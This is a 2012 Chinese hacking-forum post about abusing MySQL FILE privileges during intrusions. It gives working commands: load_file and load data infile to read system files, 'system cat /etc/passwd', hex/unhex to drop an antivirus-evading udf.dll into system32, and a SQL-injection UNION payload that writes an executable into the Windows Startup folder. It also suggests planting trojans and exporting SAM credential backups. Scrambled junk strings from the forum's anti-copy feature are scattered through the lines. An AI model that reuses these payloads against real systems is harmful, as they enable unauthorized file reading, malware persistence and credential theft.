找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1863|回复: 0
打印 上一主题 下一主题

mysql下读取文件的几种方式

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:34:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。
# Z( r4 m. t5 A, O思路都一样,在拥有file权限的前提下,读取文件为字符串形式插入表中,然后读出表中数据,只是方式略有不同
; \7 |( @. j6 k
" F% A" g9 t! u: U) Amysql3.x下
7 n; Z- [# Q  m4 w$ i( A( T' D
不确定mysql3.x下能否使用load_file()函数(我在mysql3使用手册上没有查到,但貌似是可以的),用 load data infile 读取文件,命令如下 4 V. o7 [& k# `- ~8 P
% }2 J0 z; ^* b/ J6 z! t/ ~
mysql>create table a (cmd text); ) r) P- l! R8 Q1 y
mysql>load data infile 'c:\\boot.ini' into table a;
  l! z) ]/ y3 n1 K# l) nmysql>select * from a;
- x1 Q$ k4 e9 K: \( i2 d; }4 u; S
# U8 q4 }/ [) ]+ B) Q( i$ s- ~mysql4.x下 + a' P8 t# i! p% V
3 z2 V' ~* P2 M/ c, }
mysql4.x下除了 load data infile 外还可以用大家熟知的 load_file() 来读取,命令如下 . \- H8 B7 A4 j9 h
4 @8 W& d" A+ W+ {
mysql>create table a (cmd text);   D. ]$ y" h3 Y# E- z
mysql>insert into a (cmd) values (load_file('c:\\boot.ini')); : Z: ~$ p* L4 Y: {5 z
mysql>select * from a;
) Y, r. _0 Z( T, l
1 H0 l& p5 U" Bmysql5.x下 ' ~; C; O) |/ E) @; B  N

( K  _; X  q, Y2 ~: z  H/ }在linux下,mysql5.x 除了上面两种方法,还可以利用 system 直接执行系统命令的方式来读取文件(是否必须root身份不确定,未测试),命令如下 ' T/ m0 [0 s$ B* J  x0 S8 c

' X/ }- w- L# K7 w# Lmysql>system cat /etc/passwd . ?- i4 H2 ?0 n7 x5 h% ?7 c2 ?

5 a0 q7 H. x9 \+ C/ w3 w; x
% @& Q8 L1 g+ ~- z  c1 v* W7 e/ Nmysql下读取文件在入侵中用到的时候不多,可能用于查询配置文件寻找web路径,或者webshell权限很小的时候读取其他格式的webshell内容然后用into outfile方式写入大马等,二进制文件也可以这样用,只是多了hex()和unhex()的工序。
0 l0 t) W) {: i) ^8 M
7 v6 _& X1 Q' \1 ?9 H  }; l% z8 d
' o/ b) q2 d, @例:把免杀过的udf.dll文件插入系统目录 / Y. A; \* m" K# _
) \) U/ Q2 \" z& ?4 d; g% ^
create table a (cmd LONGBLOB);
" b: H& _( u% U/ K  Sinsert into a (cmd) values (hex(load_file('c:\\windows\\temp\\udf.dll')));
0 l+ N& Q& T8 ^9 k* jSELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll'; ; \8 M9 p, e# @$ b

% B! ~0 _! ]- h( ?, D其他的利用方法也很多,如把木马文件写入启动项,或者把加工过的cmd.exe文件导出到系统根目录下,把sam备份导出到可读目录等等,注入中应该也可以这样用(在不知道web路径又可以导出文件的情况下),大家自由发挥吧。
1 h4 Y) ?# }9 L2 D" i- m% r/ K% Z0 ^  l( z$ \

- _# z( v# x* p# w注入中的语法(未测试) 2 c1 Q+ [# }) @9 X7 p0 y& a# ]5 V1 J

6 E' ^& X/ v- W  ^  V5 p8 [0 S( E' o$ S
id=xxx and 1=2 union select 1,2,3,unhex(mm.exe的十六进制),5 INTO DUMPFILE 'C:\\Documents and Settings\\All Users\\「开始」菜单\程序\启动\\mm.exe'/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表